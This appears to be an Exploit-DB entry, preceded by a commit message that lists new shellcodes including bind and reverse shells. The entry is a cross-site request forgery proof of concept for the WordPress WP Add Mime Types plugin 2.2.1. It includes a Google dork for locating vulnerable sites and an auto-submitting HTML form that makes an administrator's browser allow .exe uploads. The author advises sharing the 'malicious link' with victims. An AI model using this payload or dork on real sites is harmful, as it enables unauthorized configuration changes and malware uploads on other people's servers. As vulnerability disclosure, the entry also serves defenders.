0a59eb70a8
3 changes to exploits/shellcodes SilverSHielD 6.x - Local Privilege Escalation WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery Linux/x86_64 - Bind Shell (/bin/sh) with Configurable Password Shellcode (129 bytes) Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes) Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes) Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (120 bytes) Linux/MIPS64 - Reverse (localhost:4444/TCP) Shell Shellcode (157 bytes)
25 lines
No EOL
1.2 KiB
HTML
25 lines
No EOL
1.2 KiB
HTML
# Exploit Title: CSRF vulnerabilities in WP Add Mime Types Plugin <= 2.2.1
|
|
# Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
|
|
# Date: 18 july, 2019
|
|
# Exploit Author: Princy Edward
|
|
# Exploit Author Blog : https://prinyedward.blogspot.com/
|
|
# Vendor Homepage: https://wordpress.org/plugins/wp-add-mime-types/
|
|
# Software Link: https://downloads.wordpress.org/plugin/wp-add-mime-types.2.2.1.zip
|
|
# Version: 2.2.1
|
|
# Tested on: Apache/2.2.24 (CentOS)
|
|
# CVE : Fresh
|
|
|
|
#About Plugin
|
|
The plugin additionally allows the mime types and file extensions to WordPress. In other words, your WordPress site can upload various file extensions.
|
|
#Vulnerable Description
|
|
WordPress plugin WP Add Mime Types plugin 2.2.1 vulnerable to CWE-352.
|
|
## CSRF Code
|
|
Share this malicious link to the plugin user. Once he clicks the link, the mime type will automatically get updated. Here I shared a POC to allow exe files(application/x-msdownload) to be uploaded.
|
|
<html>
|
|
<body onload="document.forms[0].submit()">
|
|
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
|
|
<input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
|
|
<input type="submit">
|
|
</form>
|
|
</body>
|
|
</html> |